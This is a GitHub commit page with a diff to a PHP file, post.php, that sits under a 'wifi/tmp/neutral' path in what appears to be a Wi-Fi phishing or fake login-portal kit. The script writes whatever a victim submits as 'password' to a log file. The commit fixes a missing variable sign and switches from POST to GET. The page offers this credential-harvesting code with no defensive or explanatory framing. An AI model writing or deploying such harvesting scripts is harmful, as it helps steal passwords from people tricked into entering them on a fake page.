Skip to content

Commit

Permalink
Update post.php
Browse files Browse the repository at this point in the history
  • Loading branch information
RedToor authored Jun 14, 2016
1 parent d2105fb commit 5f4fbfd
Showing 1 changed file with 4 additions and 2 deletions.
6 changes: 4 additions & 2 deletions files/wifi/tmp/neutral/post.php
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@

<?php
FILE=fopen("LOGS.log","w+");
fwrite($FILE, $_POST['password']);
$FILE=fopen("LOGS.log","w+");
fwrite($FILE, $_GET['password']);
fclose($FILE);
?>

0 comments on commit 5f4fbfd

Please sign in to comment.